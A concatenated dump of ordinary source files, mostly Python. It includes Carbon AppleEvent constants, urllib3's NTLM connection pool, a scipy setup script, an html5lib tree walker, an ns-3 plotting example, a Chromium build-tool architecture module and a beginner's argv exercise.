typeLongRectangle = FOUR_CHAR_CODE('lrct')
typeMachineLoc = FOUR_CHAR_CODE('mLoc')
typeOval = FOUR_CHAR_CODE('covl')
typeParamInfo = FOUR_CHAR_CODE('pmin')
typePict = FOUR_CHAR_CODE('PICT')
typePixelMap = FOUR_CHAR_CODE('cpix')
typePixMapMinus = FOUR_CHAR_CODE('tpmm')
typePolygon = FOUR_CHAR_CODE('cpgn')
typePropInfo = FOUR_CHAR_CODE('pinf')
typePtr = FOUR_CHAR_CODE('ptr ')
typeQDPoint = FOUR_CHAR_CODE('QDpt')
typeQDRegion = FOUR_CHAR_CODE('Qrgn')
typeRectangle = FOUR_CHAR_CODE('crec')
typeRGB16 = FOUR_CHAR_CODE('tr16')
typeRGB96 = FOUR_CHAR_CODE('tr96')
typeRGBColor = FOUR_CHAR_CODE('cRGB')
typeRotation = FOUR_CHAR_CODE('trot')
typeRoundedRectangle = FOUR_CHAR_CODE('crrc')
typeRow = FOUR_CHAR_CODE('crow')
typeScrapStyles = FOUR_CHAR_CODE('styl')
typeScript = FOUR_CHAR_CODE('scpt')
typeStyledText = FOUR_CHAR_CODE('STXT')
typeSuiteInfo = FOUR_CHAR_CODE('suin')
typeTable = FOUR_CHAR_CODE('ctbl')
typeTextStyles = FOUR_CHAR_CODE('tsty')
typeTIFF = FOUR_CHAR_CODE('TIFF')
typeVersion = FOUR_CHAR_CODE('vers')
kAEMenuClass = FOUR_CHAR_CODE('menu')
kAEMenuSelect = FOUR_CHAR_CODE('mhit')
kAEMouseDown = FOUR_CHAR_CODE('mdwn')
kAEMouseDownInBack = FOUR_CHAR_CODE('mdbk')
kAEKeyDown = FOUR_CHAR_CODE('kdwn')
kAEResized = FOUR_CHAR_CODE('rsiz')
kAEPromise = FOUR_CHAR_CODE('prom')
keyMenuID = FOUR_CHAR_CODE('mid ')
keyMenuItem = FOUR_CHAR_CODE('mitm')
keyCloseAllWindows = FOUR_CHAR_CODE('caw ')
keyOriginalBounds = FOUR_CHAR_CODE('obnd')
keyNewBounds = FOUR_CHAR_CODE('nbnd')
keyLocalWhere = FOUR_CHAR_CODE('lwhr')
typeHIMenu = FOUR_CHAR_CODE('mobj')
typeHIWindow = FOUR_CHAR_CODE('wobj')
kBySmallIcon = 0
kByIconView = 1
kByNameView = 2
kByDateView = 3
kBySizeView = 4
kByKindView = 5
kByCommentView = 6
kByLabelView = 7
kByVersionView = 8
kAEInfo = 11
kAEMain = 0
kAESharing = 13
kAEZoomIn = 7
kAEZoomOut = 8
kTextServiceClass = FOUR_CHAR_CODE('tsvc')
kUpdateActiveInputArea = FOUR_CHAR_CODE('updt')
kShowHideInputWindow = FOUR_CHAR_CODE('shiw')
kPos2Offset = FOUR_CHAR_CODE('p2st')
kOffset2Pos = FOUR_CHAR_CODE('st2p')
kUnicodeNotFromInputMethod = FOUR_CHAR_CODE('unim')
kGetSelectedText = FOUR_CHAR_CODE('gtxt')
keyAETSMDocumentRefcon = FOUR_CHAR_CODE('refc')
keyAEServerInstance = FOUR_CHAR_CODE('srvi')
keyAETheData = FOUR_CHAR_CODE('kdat')
keyAEFixLength = FOUR_CHAR_CODE('fixl')
keyAEUpdateRange = FOUR_CHAR_CODE('udng')
keyAECurrentPoint = FOUR_CHAR_CODE('cpos')
keyAEBufferSize = FOUR_CHAR_CODE('buff')
keyAEMoveView = FOUR_CHAR_CODE('mvvw')
keyAENextBody = FOUR_CHAR_CODE('nxbd')
keyAETSMScriptTag = FOUR_CHAR_CODE('sclg')
keyAETSMTextFont = FOUR_CHAR_CODE('ktxf')
keyAETSMTextFMFont = FOUR_CHAR_CODE('ktxm')
keyAETSMTextPointSize = FOUR_CHAR_CODE('ktps')
keyAETSMEventRecord = FOUR_CHAR_CODE('tevt')
keyAETSMEventRef = FOUR_CHAR_CODE('tevr')
keyAETextServiceEncoding = FOUR_CHAR_CODE('tsen')
keyAETextServiceMacEncoding = FOUR_CHAR_CODE('tmen')
typeTextRange = FOUR_CHAR_CODE('txrn')
typeComponentInstance = FOUR_CHAR_CODE('cmpi')
typeOffsetArray = FOUR_CHAR_CODE('ofay')
typeTextRangeArray = FOUR_CHAR_CODE('tray')
typeLowLevelEventRecord = FOUR_CHAR_CODE('evtr')
typeEventRef = FOUR_CHAR_CODE('evrf')
typeText = typeChar
kTSMOutsideOfBody = 1
kTSMInsideOfBody = 2
kTSMInsideOfActiveInputArea = 3
kNextBody = 1
kPreviousBody = 2
kCaretPosition = 1
kRawText = 2
kSelectedRawText = 3
kConvertedText = 4
kSelectedConvertedText = 5
kBlockFillText = 6
kOutlineText = 7
kSelectedText = 8
keyAEHiliteRange = FOUR_CHAR_CODE('hrng')
keyAEPinRange = FOUR_CHAR_CODE('pnrg')
keyAEClauseOffsets = FOUR_CHAR_CODE('clau')
keyAEOffset = FOUR_CHAR_CODE('ofst')
keyAEPoint = FOUR_CHAR_CODE('gpos')
keyAELeftSide = FOUR_CHAR_CODE('klef')
keyAERegionClass = FOUR_CHAR_CODE('rgnc')
keyAEDragging = FOUR_CHAR_CODE('bool')
keyAELeadingEdge = keyAELeftSide
typeUnicodeText = FOUR_CHAR_CODE('utxt')
typeStyledUnicodeText = FOUR_CHAR_CODE('sutx')
typeEncodedString = FOUR_CHAR_CODE('encs')
typeCString = FOUR_CHAR_CODE('cstr')
typePString = FOUR_CHAR_CODE('pstr')
typeMeters = FOUR_CHAR_CODE('metr')
typeInches = FOUR_CHAR_CODE('inch')
typeFeet = FOUR_CHAR_CODE('feet')
typeYards = FOUR_CHAR_CODE('yard')
typeMiles = FOUR_CHAR_CODE('mile')
typeKilometers = FOUR_CHAR_CODE('kmtr')
typeCentimeters = FOUR_CHAR_CODE('cmtr')
typeSquareMeters = FOUR_CHAR_CODE('sqrm')
typeSquareFeet = FOUR_CHAR_CODE('sqft')
typeSquareYards = FOUR_CHAR_CODE('sqyd')
typeSquareMiles = FOUR_CHAR_CODE('sqmi')
typeSquareKilometers = FOUR_CHAR_CODE('sqkm')
typeLiters = FOUR_CHAR_CODE('litr')
typeQuarts = FOUR_CHAR_CODE('qrts')
typeGallons = FOUR_CHAR_CODE('galn')
typeCubicMeters = FOUR_CHAR_CODE('cmet')
typeCubicFeet = FOUR_CHAR_CODE('cfet')
typeCubicInches = FOUR_CHAR_CODE('cuin')
typeCubicCentimeter = FOUR_CHAR_CODE('ccmt')
typeCubicYards = FOUR_CHAR_CODE('cyrd')
typeKilograms = FOUR_CHAR_CODE('kgrm')
typeGrams = FOUR_CHAR_CODE('gram')
typeOunces = FOUR_CHAR_CODE('ozs ')
typePounds = FOUR_CHAR_CODE('lbs ')
typeDegreesC = FOUR_CHAR_CODE('degc')
typeDegreesF = FOUR_CHAR_CODE('degf')
typeDegreesK = FOUR_CHAR_CODE('degk')
kFAServerApp = FOUR_CHAR_CODE('ssrv')
kDoFolderActionEvent = FOUR_CHAR_CODE('fola')
kFolderActionCode = FOUR_CHAR_CODE('actn')
kFolderOpenedEvent = FOUR_CHAR_CODE('fopn')
kFolderClosedEvent = FOUR_CHAR_CODE('fclo')
kFolderWindowMovedEvent = FOUR_CHAR_CODE('fsiz')
kFolderItemsAddedEvent = FOUR_CHAR_CODE('fget')
kFolderItemsRemovedEvent = FOUR_CHAR_CODE('flos')
kItemList = FOUR_CHAR_CODE('flst')
kNewSizeParameter = FOUR_CHAR_CODE('fnsz')
kFASuiteCode = FOUR_CHAR_CODE('faco')
kFAAttachCommand = FOUR_CHAR_CODE('atfa')
kFARemoveCommand = FOUR_CHAR_CODE('rmfa')
kFAEditCommand = FOUR_CHAR_CODE('edfa')
kFAFileParam = FOUR_CHAR_CODE('faal')
kFAIndexParam = FOUR_CHAR_CODE('indx')
kAEInternetSuite = FOUR_CHAR_CODE('gurl')
kAEISWebStarSuite = FOUR_CHAR_CODE('WWW\xbd')
kAEISGetURL = FOUR_CHAR_CODE('gurl')
KAEISHandleCGI = FOUR_CHAR_CODE('sdoc')
cURL = FOUR_CHAR_CODE('url ')
cInternetAddress = FOUR_CHAR_CODE('IPAD')
cHTML = FOUR_CHAR_CODE('html')
cFTPItem = FOUR_CHAR_CODE('ftp ')
kAEISHTTPSearchArgs = FOUR_CHAR_CODE('kfor')
kAEISPostArgs = FOUR_CHAR_CODE('post')
kAEISMethod = FOUR_CHAR_CODE('meth')
kAEISClientAddress = FOUR_CHAR_CODE('addr')
kAEISUserName = FOUR_CHAR_CODE('user')
kAEISPassword = FOUR_CHAR_CODE('pass')
kAEISFromUser = FOUR_CHAR_CODE('frmu')
kAEISServerName = FOUR_CHAR_CODE('svnm')
kAEISServerPort = FOUR_CHAR_CODE('svpt')
kAEISScriptName = FOUR_CHAR_CODE('scnm')
kAEISContentType = FOUR_CHAR_CODE('ctyp')
kAEISReferrer = FOUR_CHAR_CODE('refr')
kAEISUserAgent = FOUR_CHAR_CODE('Agnt')
kAEISAction = FOUR_CHAR_CODE('Kact')
kAEISActionPath = FOUR_CHAR_CODE('Kapt')
kAEISClientIP = FOUR_CHAR_CODE('Kcip')
kAEISFullRequest = FOUR_CHAR_CODE('Kfrq')
pScheme = FOUR_CHAR_CODE('pusc')
pHost = FOUR_CHAR_CODE('HOST')
pPath = FOUR_CHAR_CODE('FTPc')
pUserName = FOUR_CHAR_CODE('RAun')
pUserPassword = FOUR_CHAR_CODE('RApw')
pDNSForm = FOUR_CHAR_CODE('pDNS')
pURL = FOUR_CHAR_CODE('pURL')
pTextEncoding = FOUR_CHAR_CODE('ptxe')
pFTPKind = FOUR_CHAR_CODE('kind')
eScheme = FOUR_CHAR_CODE('esch')
eurlHTTP = FOUR_CHAR_CODE('http')
eurlHTTPS = FOUR_CHAR_CODE('htps')
eurlFTP = FOUR_CHAR_CODE('ftp ')
eurlMail = FOUR_CHAR_CODE('mail')
eurlFile = FOUR_CHAR_CODE('file')
eurlGopher = FOUR_CHAR_CODE('gphr')
eurlTelnet = FOUR_CHAR_CODE('tlnt')
eurlNews = FOUR_CHAR_CODE('news')
eurlSNews = FOUR_CHAR_CODE('snws')
eurlNNTP = FOUR_CHAR_CODE('nntp')
eurlMessage = FOUR_CHAR_CODE('mess')
eurlMailbox = FOUR_CHAR_CODE('mbox')
eurlMulti = FOUR_CHAR_CODE('mult')
eurlLaunch = FOUR_CHAR_CODE('laun')
eurlAFP = FOUR_CHAR_CODE('afp ')
eurlAT = FOUR_CHAR_CODE('at ')
eurlEPPC = FOUR_CHAR_CODE('eppc')
eurlRTSP = FOUR_CHAR_CODE('rtsp')
eurlIMAP = FOUR_CHAR_CODE('imap')
eurlNFS = FOUR_CHAR_CODE('unfs')
eurlPOP = FOUR_CHAR_CODE('upop')
eurlLDAP = FOUR_CHAR_CODE('uldp')
eurlUnknown = FOUR_CHAR_CODE('url?')
kConnSuite = FOUR_CHAR_CODE('macc')
cDevSpec = FOUR_CHAR_CODE('cdev')
cAddressSpec = FOUR_CHAR_CODE('cadr')
cADBAddress = FOUR_CHAR_CODE('cadb')
cAppleTalkAddress = FOUR_CHAR_CODE('cat ')
cBusAddress = FOUR_CHAR_CODE('cbus')
cEthernetAddress = FOUR_CHAR_CODE('cen ')
cFireWireAddress = FOUR_CHAR_CODE('cfw ')
cIPAddress = FOUR_CHAR_CODE('cip ')
cLocalTalkAddress = FOUR_CHAR_CODE('clt ')
cSCSIAddress = FOUR_CHAR_CODE('cscs')
cTokenRingAddress = FOUR_CHAR_CODE('ctok')
cUSBAddress = FOUR_CHAR_CODE('cusb')
pDeviceType = FOUR_CHAR_CODE('pdvt')
pDeviceAddress = FOUR_CHAR_CODE('pdva')
pConduit = FOUR_CHAR_CODE('pcon')
pProtocol = FOUR_CHAR_CODE('pprt')
pATMachine = FOUR_CHAR_CODE('patm')
pATZone = FOUR_CHAR_CODE('patz')
pATType = FOUR_CHAR_CODE('patt')
pDottedDecimal = FOUR_CHAR_CODE('pipd')
pDNS = FOUR_CHAR_CODE('pdns')
pPort = FOUR_CHAR_CODE('ppor')
pNetwork = FOUR_CHAR_CODE('pnet')
pNode = FOUR_CHAR_CODE('pnod')
pSocket = FOUR_CHAR_CODE('psoc')
pSCSIBus = FOUR_CHAR_CODE('pscb')
pSCSILUN = FOUR_CHAR_CODE('pslu')
eDeviceType = FOUR_CHAR_CODE('edvt')
eAddressSpec = FOUR_CHAR_CODE('eads')
eConduit = FOUR_CHAR_CODE('econ')
eProtocol = FOUR_CHAR_CODE('epro')
eADB = FOUR_CHAR_CODE('eadb')
eAnalogAudio = FOUR_CHAR_CODE('epau')
eAppleTalk = FOUR_CHAR_CODE('epat')
eAudioLineIn = FOUR_CHAR_CODE('ecai')
eAudioLineOut = FOUR_CHAR_CODE('ecal')
eAudioOut = FOUR_CHAR_CODE('ecao')
eBus = FOUR_CHAR_CODE('ebus')
eCDROM = FOUR_CHAR_CODE('ecd ')
eCommSlot = FOUR_CHAR_CODE('eccm')
eDigitalAudio = FOUR_CHAR_CODE('epda')
eDisplay = FOUR_CHAR_CODE('edds')
eDVD = FOUR_CHAR_CODE('edvd')
eEthernet = FOUR_CHAR_CODE('ecen')
eFireWire = FOUR_CHAR_CODE('ecfw')
eFloppy = FOUR_CHAR_CODE('efd ')
eHD = FOUR_CHAR_CODE('ehd ')
eInfrared = FOUR_CHAR_CODE('ecir')
eIP = FOUR_CHAR_CODE('epip')
eIrDA = FOUR_CHAR_CODE('epir')
eIRTalk = FOUR_CHAR_CODE('epit')
eKeyboard = FOUR_CHAR_CODE('ekbd')
eLCD = FOUR_CHAR_CODE('edlc')
eLocalTalk = FOUR_CHAR_CODE('eclt')
eMacIP = FOUR_CHAR_CODE('epmi')
eMacVideo = FOUR_CHAR_CODE('epmv')
eMicrophone = FOUR_CHAR_CODE('ecmi')
eModemPort = FOUR_CHAR_CODE('ecmp')
eModemPrinterPort = FOUR_CHAR_CODE('empp')
eModem = FOUR_CHAR_CODE('edmm')
eMonitorOut = FOUR_CHAR_CODE('ecmn')
eMouse = FOUR_CHAR_CODE('emou')
eNuBusCard = FOUR_CHAR_CODE('ednb')
eNuBus = FOUR_CHAR_CODE('enub')
ePCcard = FOUR_CHAR_CODE('ecpc')
ePCIbus = FOUR_CHAR_CODE('ecpi')
ePCIcard = FOUR_CHAR_CODE('edpi')
ePDSslot = FOUR_CHAR_CODE('ecpd')
ePDScard = FOUR_CHAR_CODE('epds')
ePointingDevice = FOUR_CHAR_CODE('edpd')
ePostScript = FOUR_CHAR_CODE('epps')
ePPP = FOUR_CHAR_CODE('eppp')
ePrinterPort = FOUR_CHAR_CODE('ecpp')
ePrinter = FOUR_CHAR_CODE('edpr')
eSvideo = FOUR_CHAR_CODE('epsv')
eSCSI = FOUR_CHAR_CODE('ecsc')
eSerial = FOUR_CHAR_CODE('epsr')
eSpeakers = FOUR_CHAR_CODE('edsp')
eStorageDevice = FOUR_CHAR_CODE('edst')
eSVGA = FOUR_CHAR_CODE('epsg')
eTokenRing = FOUR_CHAR_CODE('etok')
eTrackball = FOUR_CHAR_CODE('etrk')
eTrackpad = FOUR_CHAR_CODE('edtp')
eUSB = FOUR_CHAR_CODE('ecus')
eVideoIn = FOUR_CHAR_CODE('ecvi')
eVideoMonitor = FOUR_CHAR_CODE('edvm')
eVideoOut = FOUR_CHAR_CODE('ecvo')
cKeystroke = FOUR_CHAR_CODE('kprs')
pKeystrokeKey = FOUR_CHAR_CODE('kMsg')
pModifiers = FOUR_CHAR_CODE('kMod')
pKeyKind = FOUR_CHAR_CODE('kknd')
eModifiers = FOUR_CHAR_CODE('eMds')
eOptionDown = FOUR_CHAR_CODE('Kopt')
eCommandDown = FOUR_CHAR_CODE('Kcmd')
eControlDown = FOUR_CHAR_CODE('Kctl')
eShiftDown = FOUR_CHAR_CODE('Ksft')
eCapsLockDown = FOUR_CHAR_CODE('Kclk')
eKeyKind = FOUR_CHAR_CODE('ekst')
eEscapeKey = 0x6B733500
eDeleteKey = 0x6B733300
eTabKey = 0x6B733000
eReturnKey = 0x6B732400
eClearKey = 0x6B734700
eEnterKey = 0x6B734C00
eUpArrowKey = 0x6B737E00
eDownArrowKey = 0x6B737D00
eLeftArrowKey = 0x6B737B00
eRightArrowKey = 0x6B737C00
eHelpKey = 0x6B737200
eHomeKey = 0x6B737300
ePageUpKey = 0x6B737400
ePageDownKey = 0x6B737900
eForwardDelKey = 0x6B737500
eEndKey = 0x6B737700
eF1Key = 0x6B737A00
eF2Key = 0x6B737800
eF3Key = 0x6B736300
eF4Key = 0x6B737600
eF5Key = 0x6B736000
eF6Key = 0x6B736100
eF7Key = 0x6B736200
eF8Key = 0x6B736400
eF9Key = 0x6B736500
eF10Key = 0x6B736D00
eF11Key = 0x6B736700
eF12Key = 0x6B736F00
eF13Key = 0x6B736900
eF14Key = 0x6B736B00
eF15Key = 0x6B737100
kAEAND = FOUR_CHAR_CODE('AND ')
kAEOR = FOUR_CHAR_CODE('OR ')
kAENOT = FOUR_CHAR_CODE('NOT ')
kAEFirst = FOUR_CHAR_CODE('firs')
kAELast = FOUR_CHAR_CODE('last')
kAEMiddle = FOUR_CHAR_CODE('midd')
kAEAny = FOUR_CHAR_CODE('any ')
kAEAll = FOUR_CHAR_CODE('all ')
kAENext = FOUR_CHAR_CODE('next')
kAEPrevious = FOUR_CHAR_CODE('prev')
keyAECompOperator = FOUR_CHAR_CODE('relo')
keyAELogicalTerms = FOUR_CHAR_CODE('term')
keyAELogicalOperator = FOUR_CHAR_CODE('logc')
keyAEObject1 = FOUR_CHAR_CODE('obj1')
keyAEObject2 = FOUR_CHAR_CODE('obj2')
keyAEDesiredClass = FOUR_CHAR_CODE('want')
keyAEContainer = FOUR_CHAR_CODE('from')
keyAEKeyForm = FOUR_CHAR_CODE('form')
keyAEKeyData = FOUR_CHAR_CODE('seld')
keyAERangeStart = FOUR_CHAR_CODE('star')
keyAERangeStop = FOUR_CHAR_CODE('stop')
keyDisposeTokenProc = FOUR_CHAR_CODE('xtok')
keyAECompareProc = FOUR_CHAR_CODE('cmpr')
keyAECountProc = FOUR_CHAR_CODE('cont')
keyAEMarkTokenProc = FOUR_CHAR_CODE('mkid')
keyAEMarkProc = FOUR_CHAR_CODE('mark')
keyAEAdjustMarksProc = FOUR_CHAR_CODE('adjm')
keyAEGetErrDescProc = FOUR_CHAR_CODE('indc')
formAbsolutePosition = FOUR_CHAR_CODE('indx')
formRelativePosition = FOUR_CHAR_CODE('rele')
formTest = FOUR_CHAR_CODE('test')
formRange = FOUR_CHAR_CODE('rang')
formPropertyID = FOUR_CHAR_CODE('prop')
formName = FOUR_CHAR_CODE('name')
typeObjectSpecifier = FOUR_CHAR_CODE('obj ')
typeObjectBeingExamined = FOUR_CHAR_CODE('exmn')
typeCurrentContainer = FOUR_CHAR_CODE('ccnt')
typeToken = FOUR_CHAR_CODE('toke')
typeRelativeDescriptor = FOUR_CHAR_CODE('rel ')
typeAbsoluteOrdinal = FOUR_CHAR_CODE('abso')
typeIndexDescriptor = FOUR_CHAR_CODE('inde')
typeRangeDescriptor = FOUR_CHAR_CODE('rang')
typeLogicalDescriptor = FOUR_CHAR_CODE('logi')
typeCompDescriptor = FOUR_CHAR_CODE('cmpd')
typeOSLTokenList = FOUR_CHAR_CODE('ostl')
kAEIDoMinimum = 0x0000
kAEIDoWhose = 0x0001
kAEIDoMarking = 0x0004
kAEPassSubDescs = 0x0008
kAEResolveNestedLists = 0x0010
kAEHandleSimpleRanges = 0x0020
kAEUseRelativeIterators = 0x0040
typeWhoseDescriptor = FOUR_CHAR_CODE('whos')
formWhose = FOUR_CHAR_CODE('whos')
typeWhoseRange = FOUR_CHAR_CODE('wrng')
keyAEWhoseRangeStart = FOUR_CHAR_CODE('wstr')
keyAEWhoseRangeStop = FOUR_CHAR_CODE('wstp')
keyAEIndex = FOUR_CHAR_CODE('kidx')
keyAETest = FOUR_CHAR_CODE('ktst')
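# Editor's note (hedged, not part of the original module): in the generated
# MacPython Carbon bindings FOUR_CHAR_CODE is the identity function on its
# four-character string (def FOUR_CHAR_CODE(x): return x), and the raw hex key
# constants above pack the same four bytes as a big-endian integer, e.g.:
#
#   import struct
#   struct.pack('>I', 0x6B733500)  # -> 'ks5\x00', the code behind eEscapeKey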
|
Hazelsuko07/17WarmingUp | refs/heads/hy_try | py3.6/lib/python3.6/site-packages/pip/_vendor/requests/packages/urllib3/contrib/ntlmpool.py | 514 | """
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
from __future__ import absolute_import
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s',
self.num_connections, self.host, self.authurl)
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', reshdr)
log.debug('Response data: %s [...]', res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', dict(res.getheaders()))
log.debug('Response data: %s [...]', res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
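# Hedged usage sketch (editor's addition; host, domain, and credentials are
# hypothetical). The pool performs the NTLM handshake lazily, once per new
# connection, then keeps that socket open for later requests:
#
#   pool = NTLMConnectionPool('EXAMPLE\\alice', 'secret',
#                             authurl='/protected', host='intranet.example.com')
#   resp = pool.urlopen('GET', '/protected')
#   print(resp.status)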
|
hilaskis/UAV_MissionPlanner | refs/heads/master | Lib/site-packages/scipy/setup.py | 59 |
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('scipy',parent_package,top_path)
config.add_subpackage('cluster')
config.add_subpackage('constants')
config.add_subpackage('fftpack')
config.add_subpackage('integrate')
config.add_subpackage('interpolate')
config.add_subpackage('io')
config.add_subpackage('lib')
config.add_subpackage('linalg')
config.add_subpackage('maxentropy')
config.add_subpackage('misc')
config.add_subpackage('odr')
config.add_subpackage('optimize')
config.add_subpackage('signal')
config.add_subpackage('sparse')
config.add_subpackage('spatial')
config.add_subpackage('special')
config.add_subpackage('stats')
config.add_subpackage('ndimage')
config.add_subpackage('weave')
config.make_svn_version_py() # installs __svn_version__.py
config.make_config_py()
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
vdmann/cse-360-image-hosting-website | refs/heads/master | lib/python2.7/site-packages/pip/_vendor/html5lib/treewalkers/pulldom.py | 1729 | from __future__ import absolute_import, division, unicode_literals
from xml.dom.pulldom import START_ELEMENT, END_ELEMENT, \
COMMENT, IGNORABLE_WHITESPACE, CHARACTERS
from . import _base
from ..constants import voidElements
class TreeWalker(_base.TreeWalker):
def __iter__(self):
ignore_until = None
previous = None
for event in self.tree:
if previous is not None and \
(ignore_until is None or previous[1] is ignore_until):
if previous[1] is ignore_until:
ignore_until = None
for token in self.tokens(previous, event):
yield token
if token["type"] == "EmptyTag":
ignore_until = previous[1]
previous = event
if ignore_until is None or previous[1] is ignore_until:
for token in self.tokens(previous, None):
yield token
elif ignore_until is not None:
raise ValueError("Illformed DOM event stream: void element without END_ELEMENT")
def tokens(self, event, next):
type, node = event
if type == START_ELEMENT:
name = node.nodeName
namespace = node.namespaceURI
attrs = {}
for attr in list(node.attributes.keys()):
attr = node.getAttributeNode(attr)
attrs[(attr.namespaceURI, attr.localName)] = attr.value
if name in voidElements:
for token in self.emptyTag(namespace,
name,
attrs,
not next or next[1] is not node):
yield token
else:
yield self.startTag(namespace, name, attrs)
elif type == END_ELEMENT:
name = node.nodeName
namespace = node.namespaceURI
if name not in voidElements:
yield self.endTag(namespace, name)
elif type == COMMENT:
yield self.comment(node.nodeValue)
elif type in (IGNORABLE_WHITESPACE, CHARACTERS):
for token in self.text(node.nodeValue):
yield token
else:
yield self.unknown(type)
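# Hedged usage sketch (editor's addition; illustrative only, since this module
# uses relative imports and is normally reached through html5lib's dispatcher):
#
#   import html5lib
#   from xml.dom import pulldom
#   Walker = html5lib.getTreeWalker("pulldom")
#   for token in Walker(pulldom.parseString("<p>hi<br></p>")):
#       print(token["type"])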
|
banmoy/ns3 | refs/heads/master | src/core/examples/sample-rng-plot.py | 188 | # -*- Mode:Python; -*-
# /*
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License version 2 as
# * published by the Free Software Foundation
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# */
# Demonstrate use of ns-3 as a random number generator integrated with
# plotting tools; adapted from Gustavo Carneiro's ns-3 tutorial
import numpy as np
import matplotlib.pyplot as plt
import ns.core
# mu, var = 100, 225
rng = ns.core.NormalVariable(100.0, 225.0)
x = [rng.GetValue() for t in range(10000)]
# the histogram of the data
n, bins, patches = plt.hist(x, 50, normed=1, facecolor='g', alpha=0.75)
plt.title('ns-3 histogram')
plt.text(60, .025, r'$\mu=100,\ \sigma=15$')
plt.axis([40, 160, 0, 0.03])
plt.grid(True)
plt.show()
|
boundarydevices/android_external_chromium_org | refs/heads/cm-12.0 | tools/cr/cr/base/arch.py | 113 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A module for the basic architectures supported by cr."""
import cr
DEFAULT = cr.Config.From(
CR_ENVSETUP_ARCH='{CR_ARCH}',
)
class Arch(cr.Plugin, cr.Plugin.Type):
"""Base class for implementing cr architecture targets."""
SELECTOR = 'CR_ARCH'
@classmethod
def AddArguments(cls, parser):
parser.add_argument(
'--architecture', dest=cls.SELECTOR,
choices=cls.Choices(),
default=None,
help='Sets the target architecture to use. Overrides ' + cls.SELECTOR
)
class IA32Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='ia32',
)
class Mips32Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='mipsel',
)
@property
def enabled(self):
return cr.AndroidPlatform.GetInstance().is_active
class X64Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='x64',
)
@property
def priority(self):
return super(X64Arch, self).priority + 1
class Arm32Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='arm',
)
@property
def priority(self):
return super(Arm32Arch, self).priority + 2
@property
def enabled(self):
return cr.AndroidPlatform.GetInstance().is_active
class Arm64Arch(Arch):
ACTIVE = cr.Config.From(
CR_ENVSETUP_ARCH='arm64',
)
@property
def enabled(self):
return cr.AndroidPlatform.GetInstance().is_active
|
CodeCatz/litterbox | refs/heads/master | Natasa/Vaja_13.py | 1 | # Input method to pass variables to a script (py files)
# Import - this is how you add features (MODULE) to your script from
# Python feature (MODULE) set.
# argv = "argument variable" - it holds arguments you pass when you run it
from sys import argv
# "unpacks" argv : Take whatever in ARGV, unpack it and assign it
# to all of those variables on the left in order
script, first, second, third = argv
print "The script is called: ", script
print "Your first variable is: ", first
print "Your second variable is: ", second
print "Your third variable: ", third
# You run this from command line - python Vaja_13.py hamburger marmelada sir
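# Expected output for that invocation (editor's addition, derived from the
# print statements above):
#   The script is called:  Vaja_13.py
#   Your first variable is:  hamburger
#   Your second variable is:  marmelada
#   Your third variable:  sir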
|
zturchan/CMPUT410-Lab4 | refs/heads/master | env-lab4/lib/python2.7/ntpath.py | 4 | /usr/lib/python2.7/ntpath.py |
